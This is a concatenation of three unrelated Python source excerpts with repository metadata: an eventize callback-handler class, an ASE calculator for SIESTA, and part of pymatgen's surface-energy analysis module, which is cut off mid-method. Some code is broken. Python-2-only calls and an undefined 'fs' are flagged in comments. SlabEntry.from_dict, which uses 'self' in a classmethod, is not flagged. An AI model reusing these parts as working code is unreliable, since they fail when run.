        self._assert_valid(callback)
        return list.insert(self, key, callback)

    def extend(self, callbacks):
        self._assert_list_valid(callbacks)
        return list.extend(self, callbacks)

    def update(self, other):
        """Merge another handler's callbacks, condition and visitors."""
        self.extend(other)
        self.condition = getattr(other, 'condition', self.condition)
        self.visitors.extend(self, getattr(other, 'visitors', []))
        return self

    def clear_events(self):
        self.events = tuple()

    def empty(self):
        # Remove all callbacks, keep recorded events.
        del self[0:]

    def clear(self):
        # Full reset: drop both event history and callbacks.
        self.clear_events()
        self.empty()

    def _assert_list_valid(self, callbacks):
        tuple(map(self._assert_valid, callbacks))

    def _assert_valid(self, callback):
        if not callable(callback):
            raise TypeError('"%s": is not callable' % callback)

    def __iadd__(self, callback):
        # handler += callback  -> append
        self.append(callback)
        return self

    def __isub__(self, callback):
        # handler -= callback  -> remove every occurrence
        while callback in self:
            self.remove(callback)
        return self

    def __repr__(self):
        return "%s: %s" % (type(self).__name__, list(self).__repr__())

    def __eq__(self, handler):
        # Handlers compare equal when their conditions are equal (used
        # by when() to find an existing sub-handler).
        return getattr(self, 'condition', None) == getattr(handler, 'condition', None)

    def __setitem__(self, key, callback):
        self._assert_valid(callback)
        return list.__setitem__(self, key, callback)

    # Fluent aliases for append.
    do = then = append
|
apieum/eventize
|
eventize/events/handler.py
|
Python
|
lgpl-3.0
| 3,963
|
[
"VisIt"
] |
ec0f32def237444d0698d3ee127740f0966b6767ec80ce9b482b2738dd9d88d0
|
"""This module defines an ASE interface to SIESTA.
http://www.uam.es/departamentos/ciencias/fismateriac/siesta
"""
import os
from os.path import join, isfile, islink
import numpy as np
from ase.data import chemical_symbols
class Siesta:
    """Class for doing SIESTA calculations.

    The default parameters are very close to those that the SIESTA
    Fortran code would use. These are the exceptions::

        calc = Siesta(label='siesta', xc='LDA', pulay=5, mix=0.1)

    Use the set_fdf method to set extra FDF parameters::

        calc.set_fdf('PAO.EnergyShift', 0.01 * Rydberg)

    NOTE(review): this module uses Python 2-only constructs (execfile,
    iterator .next()); it will not run under Python 3 as-is.
    """

    def __init__(self, label='siesta', xc='LDA', kpts=None, nbands=None,
                 width=None, meshcutoff=None, charge=None,
                 pulay=5, mix=0.1, maxiter=120,
                 basis=None, ghosts=[],
                 write_fdf=True):
        """Construct SIESTA-calculator object.

        Parameters
        ==========
        label: str
            Prefix to use for filenames (label.fdf, label.txt, ...).
            Default is 'siesta'.
        xc: str
            Exchange-correlation functional. Must be one of LDA, PBE,
            revPBE, RPBE.
        kpts: list of three int
            Monkhorst-Pack sampling.
        nbands: int
            Number of bands.
        width: float
            Fermi-distribution width in eV.
        meshcutoff: float
            Cutoff energy in eV for grid.
        charge: float
            Total charge of the system.
        pulay: int
            Number of old densities to use for Pulay mixing.
        mix: float
            Mixing parameter between zero and one for density mixing.
        write_fdf: bool
            Use write_fdf=False to use your own fdf-file.

        Examples
        ========
        Use default values:

        >>> h = Atoms('H', calculator=Siesta())
        >>> h.center(vacuum=3.0)
        >>> e = h.get_potential_energy()
        """
        # NOTE(review): ghosts=[] is a mutable default argument; safe only
        # as long as callers never mutate the calculator's ghosts list.
        self.label = label
        self.xc = xc
        self.kpts = kpts
        self.nbands = nbands
        self.width = width
        self.meshcutoff = meshcutoff
        self.charge = charge
        self.pulay = pulay
        self.mix = mix
        self.maxiter = maxiter
        self.basis = basis
        self.ghosts = ghosts
        self.write_fdf_file = write_fdf
        self.converged = False
        # Extra user-supplied FDF parameters (see set_fdf).
        self.fdf = {}

    def update(self, atoms):
        """Re-run the calculation only if `atoms` changed since last run."""
        # A change in the number or identity of atoms requires full
        # re-initialization (species list, pseudopotentials).
        if (not self.converged or
            len(self.numbers) != len(atoms) or
            (self.numbers != atoms.get_atomic_numbers()).any()):
            self.initialize(atoms)
            self.calculate(atoms)
        # A mere change of positions/cell/pbc only needs recalculation.
        elif ((self.positions != atoms.get_positions()).any() or
              (self.pbc != atoms.get_pbc()).any() or
              (self.cell != atoms.get_cell()).any()):
            self.calculate(atoms)

    def initialize(self, atoms):
        """Collect species and symlink pseudopotential files into cwd."""
        self.numbers = atoms.get_atomic_numbers().copy()
        self.species = []
        for a, Z in enumerate(self.numbers):
            # Ghost atoms are encoded with a negative atomic number.
            if a in self.ghosts:
                Z = -Z
            if Z not in self.species:
                self.species.append(Z)
        if 'SIESTA_PP_PATH' in os.environ:
            pppaths = os.environ['SIESTA_PP_PATH'].split(':')
        else:
            pppaths = []
        for Z in self.species:
            symbol = chemical_symbols[abs(Z)]
            name = symbol + '.vps'
            name1 = symbol + '.psf'
            found = False
            # Search every path for either a .vps or .psf pseudopotential
            # and symlink it into the working directory.
            for path in pppaths:
                filename = join(path, name)
                filename1 = join(path, name1)
                if isfile(filename) or islink(filename):
                    found = True
                    if path != '.':
                        if islink(name) or isfile(name):
                            os.remove(name)
                        os.symlink(filename, name)
                elif isfile(filename1) or islink(filename1):
                    found = True
                    if path != '.':
                        if islink(name1) or isfile(name1):
                            os.remove(name1)
                        os.symlink(filename1, name1)
            if not found:
                raise RuntimeError('No pseudopotential for %s!' % symbol)
        self.converged = False

    def get_potential_energy(self, atoms, force_consistent=False):
        self.update(atoms)
        if force_consistent:
            return self.efree
        else:
            # Energy extrapolated to zero Kelvin:
            return (self.etotal + self.efree) / 2

    def get_forces(self, atoms):
        self.update(atoms)
        return self.forces.copy()

    def get_stress(self, atoms):
        self.update(atoms)
        return self.stress.copy()

    def calculate(self, atoms):
        """Write input, run the SIESTA driver script, and read results."""
        self.positions = atoms.get_positions().copy()
        self.cell = atoms.get_cell().copy()
        self.pbc = atoms.get_pbc().copy()
        if self.write_fdf_file:
            self.write_fdf(atoms)
        # The driver script pointed to by SIESTA_SCRIPT must set
        # `exitcode` in its namespace.  NOTE(review): execfile is
        # Python 2 only.
        siesta = os.environ['SIESTA_SCRIPT']
        locals = {'label': self.label}
        execfile(siesta, {}, locals)
        exitcode = locals['exitcode']
        if exitcode != 0:
            raise RuntimeError(('Siesta exited with exit code: %d.  ' +
                                'Check %s.txt for more information.') %
                               (exitcode, self.label))
        self.read()
        self.converged = True

    def set_fdf(self, key, value):
        """Set FDF parameter."""
        self.fdf[key] = value

    def write_fdf(self, atoms):
        """Write input parameters to fdf-file."""
        fh = open(self.label + '.fdf', 'w')
        # Scalar parameters; None values are skipped when writing.
        fdf = {
            'SystemLabel': self.label,
            'AtomicCoordinatesFormat': 'Ang',
            'LatticeConstant': 1.0,
            'NumberOfAtoms': len(atoms),
            'MeshCutoff': self.meshcutoff,
            'NetCharge': self.charge,
            'ElectronicTemperature': self.width,
            'NumberOfEigenStates': self.nbands,
            'DM.UseSaveDM': self.converged,
            'PAO.BasisSize': self.basis,
            'SolutionMethod': 'diagon',
            'DM.NumberPulay': self.pulay,
            'DM.MixingWeight': self.mix,
            'MaxSCFIterations': self.maxiter
            }
        if self.xc != 'LDA':
            fdf['xc.functional'] = 'GGA'
            fdf['xc.authors'] = self.xc
        magmoms = atoms.get_initial_magnetic_moments()
        if magmoms.any():
            fdf['SpinPolarized'] = True
            fh.write('%block InitSpin\n')
            for n, M in enumerate(magmoms):
                if M != 0:
                    fh.write('%d %.14f\n' % (n + 1, M))
            fh.write('%endblock InitSpin\n')
        fdf['Number_of_species'] = len(self.species)
        # User-supplied parameters override the defaults above.
        fdf.update(self.fdf)
        for key, value in fdf.items():
            if value is None:
                continue
            if isinstance(value, list):
                fh.write('%%block %s\n' % key)
                for line in value:
                    fh.write(line + '\n')
                fh.write('%%endblock %s\n' % key)
            else:
                unit = keys_with_units.get(fdfify(key))
                if unit is None:
                    fh.write('%s %s\n' % (key, value))
                else:
                    # NOTE(review): `fs` is neither defined nor imported in
                    # this module -- these branches would raise NameError;
                    # confirm the intended `from ase.units import fs`.
                    if 'fs**2' in unit:
                        value /= fs**2
                    elif 'fs' in unit:
                        value /= fs
                    fh.write('%s %f %s\n' % (key, value, unit))
        fh.write('%block LatticeVectors\n')
        for v in self.cell:
            fh.write('%.14f %.14f %.14f\n' % tuple(v))
        fh.write('%endblock LatticeVectors\n')
        fh.write('%block Chemical_Species_label\n')
        for n, Z in enumerate(self.species):
            fh.write('%d %s %s\n' % (n + 1, Z, chemical_symbols[abs(Z)]))
        fh.write('%endblock Chemical_Species_label\n')
        fh.write('%block AtomicCoordinatesAndAtomicSpecies\n')
        a = 0
        for pos, Z in zip(self.positions, self.numbers):
            if a in self.ghosts:
                Z = -Z
            a += 1
            fh.write('%.14f %.14f %.14f' % tuple(pos))
            fh.write(' %d\n' % (self.species.index(Z) + 1))
        fh.write('%endblock AtomicCoordinatesAndAtomicSpecies\n')
        if self.kpts is not None:
            fh.write('%block kgrid_Monkhorst_Pack\n')
            for i in range(3):
                for j in range(3):
                    if i == j:
                        fh.write('%d ' % self.kpts[i])
                    else:
                        fh.write('0 ')
                # Offset of 0.5 for even grids (standard MP convention).
                fh.write('%.1f\n' % (((self.kpts[i] + 1) % 2) * 0.5))
            fh.write('%endblock kgrid_Monkhorst_Pack\n')
        fh.close()

    def read(self):
        """Read results from SIESTA's text-output file."""
        text = open(self.label + '.txt', 'r').read().lower()
        assert 'error' not in text
        lines = iter(text.split('\n'))
        # Get the number of grid points used:
        for line in lines:
            if line.startswith('initmesh: mesh ='):
                self.grid = [int(word) for word in line.split()[3:8:2]]
                break
        # Stress:
        for line in lines:
            if line.startswith('siesta: stress tensor (total) (ev/ang**3):'):
                self.stress = np.empty((3, 3))
                for i in range(3):
                    # NOTE(review): lines.next() is Python 2 only.
                    self.stress[i] = [float(word)
                                      for word in lines.next().split()]
                break
        else:
            raise RuntimeError
        # Energy:
        for line in lines:
            if line.startswith('siesta: etot    ='):
                self.etotal = float(line.split()[-1])
                self.efree = float(lines.next().split()[-1])
                break
        else:
            raise RuntimeError
        # Forces:
        lines = open(self.label + '.FA', 'r').readlines()
        assert int(lines[0]) == len(self.numbers)
        assert len(lines) == len(self.numbers) + 1
        self.forces = np.array([[float(word)
                                 for word in line.split()[1:4]]
                                for line in lines[1:]])
def fdfify(key):
    """Normalize an FDF keyword for lookup in ``keys_with_units``.

    Lower-cases the key and strips the separator characters SIESTA
    treats as insignificant ('_', '.', '-').
    """
    normalized = key.lower()
    for separator in ('_', '.', '-'):
        normalized = normalized.replace(separator, '')
    return normalized
# Units expected by SIESTA for each FDF keyword, keyed by the keyword's
# fdfify()-normalized form.  write_fdf appends the unit to the value; for
# 'fs'-based units the value is converted from ASE time units first.
keys_with_units = {
    'paoenergyshift': 'eV',
    'zmunitslength': 'Bohr',
    'zmunitsangle': 'rad',
    'zmforcetollength': 'eV/Ang',
    'zmforcetolangle': 'eV/rad',
    'zmmaxdispllength': 'Ang',
    'zmmaxdisplangle': 'rad',
    'meshcutoff': 'eV',
    'dmenergytolerance': 'eV',
    'electronictemperature': 'eV',
    'oneta': 'eV',
    'onetaalpha': 'eV',
    'onetabeta': 'eV',
    'onrclwf': 'Ang',
    'onchemicalpotentialrc': 'Ang',
    'onchemicalpotentialtemperature': 'eV',
    'mdmaxcgdispl': 'Ang',
    'mdmaxforcetol': 'eV/Ang',
    'mdmaxstresstol': 'eV/Ang**3',
    'mdlengthtimestep': 'fs',
    'mdinitialtemperature': 'eV',
    'mdtargettemperature': 'eV',
    'mdtargetpressure': 'eV/Ang**3',
    'mdnosemass': 'eV*fs**2',
    'mdparrinellorahmanmass': 'eV*fs**2',
    'mdtaurelax': 'fs',
    'mdbulkmodulus': 'eV/Ang**3',
    'mdfcdispl': 'Ang',
    'warningminimumatomicdistance': 'Ang',
    'rcspatial': 'Ang',
    'kgridcutoff': 'Ang',
    'latticeconstant': 'Ang'}
|
freephys/python_ase
|
ase/calculators/siesta.py
|
Python
|
gpl-3.0
| 11,417
|
[
"ASE",
"SIESTA"
] |
ecb84f096f597b482ca45ce3dad786cb5dc6b48607ca53ab9601e375887a6ba3
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
TODO:
-Still assumes individual elements have their own chempots
in a molecular adsorbate instead of considering a single
chempot for a single molecular adsorbate. E.g. for an OH
adsorbate, the surface energy is a function of delu_O and
delu_H instead of delu_OH
-Need a method to automatically get chempot range when
dealing with non-stoichiometric slabs
-Simplify the input for SurfaceEnergyPlotter such that the
user does not need to generate a dict
"""
import numpy as np
import itertools
import warnings
import random, copy
from sympy import Symbol, Number
from sympy.solvers import linsolve, solve
from pymatgen.core.composition import Composition
from pymatgen import Structure
from pymatgen.core.surface import get_slab_regions
from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.analysis.wulff import WulffShape
from pymatgen.util.plotting import pretty_plot
from pymatgen.io.vasp.outputs import Outcar, Locpot, Poscar
EV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656
__author__ = "Richard Tran"
__copyright__ = "Copyright 2017, The Materials Virtual Lab"
__version__ = "0.2"
__maintainer__ = "Richard Tran"
__credits__ = "Joseph Montoya, Xianguo Li"
__email__ = "rit001@eng.ucsd.edu"
__date__ = "8/24/17"
"""
This module defines tools to analyze surface and adsorption related
quantities as well as related plots. If you use this module, please
consider citing the following works::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific
Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.
and
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2 batteries.
Nano Letters, 14(2), 1016–1020. https://doi.org/10.1021/nl404557w
and
Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework
for determining adsorption energies on solid surfaces. Npj
Computational Materials, 3(1), 14.
https://doi.org/10.1038/s41524-017-0017-z
"""
class SlabEntry(ComputedStructureEntry):
"""
A ComputedStructureEntry object encompassing all data relevant to a
slab for analyzing surface thermodynamics.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: label
Brief description for this slab.
.. attribute:: adsorbates
List of ComputedStructureEntry for the types of adsorbates
..attribute:: clean_entry
SlabEntry for the corresponding clean slab for an adsorbed slab
..attribute:: ads_entries_dict
Dictionary where the key is the reduced composition of the
adsorbate entry and value is the entry itself
"""
    def __init__(self, structure, energy, miller_index, correction=0.0,
                 parameters=None, data=None, entry_id=None, label=None,
                 adsorbates=None, clean_entry=None, marker=None, color=None):
        """
        Make a SlabEntry containing all relevant surface thermodynamics data.

        Args:
            structure (Slab): The primary slab associated with this entry.
            energy (float): Energy from total energy calculation
            miller_index (tuple(h, k, l)): Miller index of plane parallel
                to surface
            correction (float): See ComputedStructureEntry
            parameters (dict): See ComputedStructureEntry
            data (dict): See ComputedStructureEntry
            entry_id (str): See ComputedStructureEntry
            label (str): Any particular label for this slab, e.g. "Tasker 2",
                "non-stoichiometric", "reconstructed"
            adsorbates ([ComputedStructureEntry]): List of reference entries
                for the adsorbates on the slab, can be an isolated molecule
                (e.g. O2 for O or O2 adsorption), a bulk structure (eg. fcc
                Cu for Cu adsorption) or anything.
            clean_entry (ComputedStructureEntry): If the SlabEntry is for an
                adsorbed slab, this is the corresponding SlabEntry for the
                clean slab
            marker (str): Custom marker for gamma plots ("--" and "-" are typical)
            color (str or rgba): Custom color for gamma plots
        """
        self.miller_index = miller_index
        self.label = label
        self.adsorbates = [] if not adsorbates else adsorbates
        self.clean_entry = clean_entry
        # Map each adsorbate's first element symbol to its reference entry
        # (presumably single-element adsorbates; see module TODO).
        self.ads_entries_dict = {str(list(ads.composition.as_dict().keys())[0]): \
                                     ads for ads in self.adsorbates}
        self.mark = marker
        self.color = color
        super(SlabEntry, self).__init__(
            structure, energy, correction=correction,
            parameters=parameters, data=data, entry_id=entry_id)
def as_dict(self):
"""
Returns dict which contains Slab Entry data.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
d["structure"] = self.structure
d["energy"] = self.energy
d["miller_index"] = self.miller_index
d["label"] = self.label
d["coverage"] = self.coverage
d["adsorbates"] = self.adsorbates
d["clean_entry"] = self.clean_entry
return d
    def gibbs_binding_energy(self, eads=False):
        """
        Returns the adsorption energy or Gibbs binding energy
        of an adsorbate on a surface

        Args:
            eads (bool): Whether to calculate the adsorption energy
                (True) or the binding energy (False) which is just
                adsorption energy normalized by number of adsorbates.
        """
        # Area ratio of adsorbed slab to its clean reference slab.
        n = self.get_unit_primitive_area
        Nads = self.Nads_in_slab
        # Per-adsorbate binding energy: adsorbed slab minus area-scaled
        # clean slab, minus the isolated adsorbate reference energies.
        BE = (self.energy - n * self.clean_entry.energy) / Nads - \
             sum([ads.energy_per_atom for ads in self.adsorbates])
        return BE * Nads if eads else BE
    def surface_energy(self, ucell_entry, ref_entries=None):
        """
        Calculates the surface energy of this SlabEntry.

        Args:
            ucell_entry (entry): An entry object for the bulk
            ref_entries (list: [entry]): A list of entries for each type
                of element to be used as a reservoir for nonstoichiometric
                systems. The length of this list MUST be n-1 where n is the
                number of different elements in the bulk entry. The chempot
                of the element ref_entry that is not in the list will be
                treated as a variable.

        Returns (Add (Sympy class)): Surface energy
        """
        # Set up
        ref_entries = [] if not ref_entries else ref_entries

        # Check if appropriate ref_entries are present if the slab is non-stoichiometric
        # TODO: There should be a way to identify which specific species are
        # non-stoichiometric relative to the others in systems with more than 2 species
        slab_comp = self.composition.as_dict()
        ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()
        slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp.keys()})
        if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:
            list_els = [list(entry.composition.as_dict().keys())[0] for entry in ref_entries]
            if not any([el in list_els for el in ucell_entry.composition.as_dict().keys()]):
                warnings.warn("Elemental references missing for the non-dopant species.")

        # gamma = (E_surf - E_bulk) / (2 * A); both surfaces of the slab.
        gamma = (Symbol("E_surf") - Symbol("Ebulk")) / (2 * Symbol("A"))
        ucell_comp = ucell_entry.composition
        ucell_reduced_comp = ucell_comp.reduced_composition
        # Map element symbol -> reservoir entry (adsorbates included).
        ref_entries_dict = {str(list(ref.composition.as_dict().keys())[0]): \
                                ref for ref in ref_entries}
        ref_entries_dict.update(self.ads_entries_dict)
        # Calculate Gibbs free energy of the bulk per unit formula
        gbulk = ucell_entry.energy / \
                ucell_comp.get_integer_formula_and_factor()[1]

        # First we get the contribution to the bulk energy
        # from each element with an existing ref_entry.
        bulk_energy, gbulk_eqn = 0, 0
        for el, ref in ref_entries_dict.items():
            N, delu = self.composition.as_dict()[el], Symbol("delu_" + str(el))
            if el in ucell_comp.as_dict().keys():
                gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)
            bulk_energy += N * (Symbol("delu_" + el) + ref.energy_per_atom)

        # Next, we add the contribution to the bulk energy from
        # the variable element (the element without a ref_entry),
        # as a function of the other elements
        for ref_el in ucell_comp.as_dict().keys():
            if str(ref_el) not in ref_entries_dict.keys():
                break
        refEperA = (gbulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]
        bulk_energy += self.composition.as_dict()[ref_el] * refEperA

        # Substitute known quantities; remaining symbols are the chempots.
        se = gamma.subs({Symbol("E_surf"): self.energy, Symbol("Ebulk"): bulk_energy,
                         Symbol("A"): self.surface_area})

        return float(se) if type(se).__name__ == "Float" else se
@property
def get_unit_primitive_area(self):
"""
Returns the surface area of the adsorbed system per
unit area of the primitive slab system.
"""
A_ads = self.surface_area
A_clean = self.clean_entry.surface_area
n = (A_ads / A_clean)
return n
@property
def get_monolayer(self):
"""
Returns the primitive unit surface area density of the
adsorbate.
"""
unit_a = self.get_unit_primitive_area
Nsurfs = self.Nsurfs_ads_in_slab
Nads = self.Nads_in_slab
return Nads / (unit_a * Nsurfs)
@property
def Nads_in_slab(self):
"""
Returns the TOTAL number of adsorbates in the slab on BOTH sides
"""
return sum([self.composition.as_dict()[a] for a \
in self.ads_entries_dict.keys()])
@property
def Nsurfs_ads_in_slab(self):
"""
Returns the TOTAL number of adsorbed surfaces in the slab
"""
struct = self.structure
weights = [s.species.weight for s in struct]
center_of_mass = np.average(struct.frac_coords,
weights=weights, axis=0)
Nsurfs = 0
# Are there adsorbates on top surface?
if any([site.species_string in self.ads_entries_dict.keys() for \
site in struct if site.frac_coords[2] > center_of_mass[2]]):
Nsurfs += 1
# Are there adsorbates on bottom surface?
if any([site.species_string in self.ads_entries_dict.keys() for \
site in struct if site.frac_coords[2] < center_of_mass[2]]):
Nsurfs += 1
return Nsurfs
@classmethod
def from_dict(cls, d):
"""
Returns a SlabEntry by reading in an dictionary
"""
structure = SlabEntry.from_dict(d["structure"])
energy = SlabEntry.from_dict(d["energy"])
miller_index = d["miller_index"]
label = d["label"]
coverage = d["coverage"]
adsorbates = d["adsorbates"]
clean_entry = d["clean_entry"] = self.clean_entry
return SlabEntry(structure, energy, miller_index, label=label,
coverage=coverage, adsorbates=adsorbates,
clean_entry=clean_entry)
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.structure.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def cleaned_up_slab(self):
"""
Returns a slab with the adsorbates removed
"""
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.structure.copy()
cleaned.remove_species(ads_strs)
return cleaned
@property
def create_slab_label(self):
"""
Returns a label (str) for this particular slab based
on composition, coverage and Miller index.
"""
if "label" in self.data.keys():
return self.data["label"]
label = str(self.miller_index)
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.cleaned_up_slab
label += " %s" % (cleaned.composition.reduced_composition)
if self.adsorbates:
for ads in ads_strs:
label += r"+%s" % (ads)
label += r", %.3f ML" % (self.get_monolayer)
return label
@staticmethod
def from_computed_structure_entry(entry, miller_index, label=None,
adsorbates=None, clean_entry=None, **kwargs):
"""
Returns SlabEntry from a ComputedStructureEntry
"""
return SlabEntry(entry.structure, entry.energy, miller_index, label=label,
adsorbates=adsorbates, clean_entry=clean_entry, **kwargs)
class SurfaceEnergyPlotter:
"""
A class used for generating plots to analyze the thermodynamics of surfaces
of a material. Produces stability maps of different slab configurations,
    phase diagrams of two parameters to determine stability of configurations
(future release), and Wulff shapes.
.. attribute:: all_slab_entries
Either a list of SlabEntry objects (note for a list, the SlabEntry must
        have the adsorbates and clean_entry parameter plugged in) or a nested
dictionary containing a list of entries for slab calculations as
items and the corresponding Miller index of the slab as the key.
To account for adsorption, each value is a sub-dictionary with the
entry of a clean slab calculation as the sub-key and a list of
entries for adsorption calculations as the sub-value. The sub-value
can contain different adsorption configurations such as a different
site or a different coverage, however, ordinarily only the most stable
configuration for a particular coverage will be considered as the
function of the adsorbed surface energy has an intercept dependent on
the adsorption energy (ie an adsorption site with a higher adsorption
energy will always provide a higher surface energy than a site with a
lower adsorption energy). An example parameter is provided:
{(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...],
clean_entry2: [...], ...}, (h2,k2,l2): {...}}
where clean_entry1 can be a pristine surface and clean_entry2 can be a
reconstructed surface while ads_entry1 can be adsorption at site 1 with
a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption
entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we
consider adsorption in all plots and analysis for this particular facet.
    .. attribute:: color_dict
Dictionary of colors (r,g,b,a) when plotting surface energy stability. The
keys are individual surface entries where clean surfaces have a solid
color while the corresponding adsorbed surface will be transparent.
.. attribute:: ucell_entry
ComputedStructureEntry of the bulk reference for this particular material.
.. attribute:: ref_entries
List of ComputedStructureEntries to be used for calculating chemical potential.
.. attribute:: color_dict
Randomly generated dictionary of colors associated with each facet.
"""
def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):
"""
Object for plotting surface energy in different ways for clean and
adsorbed surfaces.
Args:
all_slab_entries (dict or list): Dictionary or list containing
all entries for slab calculations. See attributes.
ucell_entry (ComputedStructureEntry): ComputedStructureEntry
of the bulk reference for this particular material.
ref_entries ([ComputedStructureEntries]): A list of entries for
each type of element to be used as a reservoir for
nonstoichiometric systems. The length of this list MUST be
n-1 where n is the number of different elements in the bulk
entry. The bulk energy term in the grand surface potential can
be defined by a summation of the chemical potentials for each
element in the system. As the bulk energy is already provided,
one can solve for one of the chemical potentials as a function
of the other chemical potetinals and bulk energy. i.e. there
are n-1 variables (chempots). e.g. if your ucell_entry is for
LiFePO4 than your ref_entries should have an entry for Li, Fe,
and P if you want to use the chempot of O as the variable.
"""
self.ucell_entry = ucell_entry
self.ref_entries = ref_entries
self.all_slab_entries = all_slab_entries if \
type(all_slab_entries).__name__ == "dict" else \
entry_dict_from_list(all_slab_entries)
self.color_dict = self.color_palette_dict()
se_dict, as_coeffs_dict = {}, {}
for hkl in self.all_slab_entries.keys():
for clean in self.all_slab_entries[hkl].keys():
se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[clean] = se
as_coeffs_dict[clean] = {1: se}
else:
se_dict[clean] = se
as_coeffs_dict[clean] = se.as_coefficients_dict()
for dope in self.all_slab_entries[hkl][clean]:
se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[dope] = se
as_coeffs_dict[dope] = {1: se}
else:
se_dict[dope] = se
as_coeffs_dict[dope] = se.as_coefficients_dict()
self.surfe_dict = se_dict
self.as_coeffs_dict = as_coeffs_dict
list_of_chempots = []
for k in self.as_coeffs_dict.keys():
if type(self.as_coeffs_dict[k]).__name__ == "float":
continue
for du in self.as_coeffs_dict[k].keys():
if du not in list_of_chempots:
list_of_chempots.append(du)
self.list_of_chempots = list_of_chempots
    def get_stable_entry_at_u(self, miller_index, delu_dict=None, delu_default=0,
                              no_doped=False, no_clean=False):
        """
        Returns the entry corresponding to the most stable slab for a particular
        facet at a specific chempot. We assume that surface energy is constant
        so all free variables must be set with delu_dict, otherwise they are
        assumed to be equal to delu_default.

        Args:
            miller_index ((h,k,l)): The facet to find the most stable slab in
            delu_dict (Dict): Dictionary of the chemical potentials to be set as
                constant. Note the key should be a sympy Symbol object of the
                format: Symbol("delu_el") where el is the name of the element.
            delu_default (float): Default value for all unset chemical potentials
            no_doped (bool): Consider stability of clean slabs only.
            no_clean (bool): Consider stability of doped slabs only.

        Returns:
            SlabEntry, surface_energy (float)
        """
        # Resolve every chempot symbol to a numeric value (user-set or
        # delu_default).
        all_delu_dict = self.set_all_variables(delu_dict, delu_default)
        def get_coeffs(e):
            # Coefficient vector for entry `e`, ordered to match the key
            # iteration order of all_delu_dict so it can be dotted with the
            # chempot values below.
            coeffs = []
            for du in all_delu_dict.keys():
                if type(self.as_coeffs_dict[e]).__name__ == 'float':
                    # NOTE(review): a constant surface energy is appended once
                    # per chempot here, so the dot product scales it by the sum
                    # of all chempot values -- looks suspicious; verify against
                    # set_all_variables' handling of the constant key.
                    coeffs.append(self.as_coeffs_dict[e])
                elif du in self.as_coeffs_dict[e].keys():
                    coeffs.append(self.as_coeffs_dict[e][du])
                else:
                    # This entry's surface energy does not depend on du.
                    coeffs.append(0)
            return np.array(coeffs)
        # Gather candidate entries (clean and/or adsorbed) and their
        # coefficient vectors for this facet.
        all_entries, all_coeffs = [], []
        for entry in self.all_slab_entries[miller_index].keys():
            if not no_clean:
                all_entries.append(entry)
                all_coeffs.append(get_coeffs(entry))
            if not no_doped:
                for ads_entry in self.all_slab_entries[miller_index][entry]:
                    all_entries.append(ads_entry)
                    all_coeffs.append(get_coeffs(ads_entry))
        # Evaluate every candidate's surface energy in one matrix-vector
        # product; dict keys() and values() iterate in the same order.
        du_vals = np.array(list(all_delu_dict.values()))
        all_gamma = list(np.dot(all_coeffs, du_vals.T))
        # The most stable entry is the one with the lowest surface energy.
        return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))
def wulff_from_chempot(self, delu_dict=None, delu_default=0, symprec=1e-5,
no_clean=False, no_doped=False):
"""
Method to get the Wulff shape at a specific chemical potential.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
symprec (float): See WulffShape.
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
(WulffShape): The WulffShape at u_ref and u_ads.
"""
latt = SpacegroupAnalyzer(self.ucell_entry.structure). \
get_conventional_standard_structure().lattice
miller_list = self.all_slab_entries.keys()
e_surf_list = []
for hkl in miller_list:
# For all configurations, calculate surface energy as a
# function of u. Use the lowest surface energy (corresponds
# to the most stable slab termination at that particular u)
gamma = self.get_stable_entry_at_u(hkl, delu_dict=delu_dict,
delu_default=delu_default,
no_clean=no_clean,
no_doped=no_doped)[1]
e_surf_list.append(gamma)
return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)
def area_frac_vs_chempot_plot(self, ref_delu, chempot_range, delu_dict=None,
delu_default=0, increments=10, no_clean=False, no_doped=False):
"""
1D plot. Plots the change in the area contribution
of each facet as a function of chemical potential.
Args:
ref_delu (sympy Symbol): The free variable chempot with the format:
Symbol("delu_el") where el is the name of the element.
chempot_range (list): Min/max range of chemical potential to plot along
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
increments (int): Number of data points between min/max or point
of intersection. Defaults to 10 points.
Returns:
(Pylab): Plot of area frac on the Wulff shape
for each facet vs chemical potential.
"""
delu_dict = delu_dict if delu_dict else {}
chempot_range = sorted(chempot_range)
all_chempots = np.linspace(min(chempot_range), max(chempot_range),
increments)
# initialize a dictionary of lists of fractional areas for each hkl
hkl_area_dict = {}
for hkl in self.all_slab_entries.keys():
hkl_area_dict[hkl] = []
# Get plot points for each Miller index
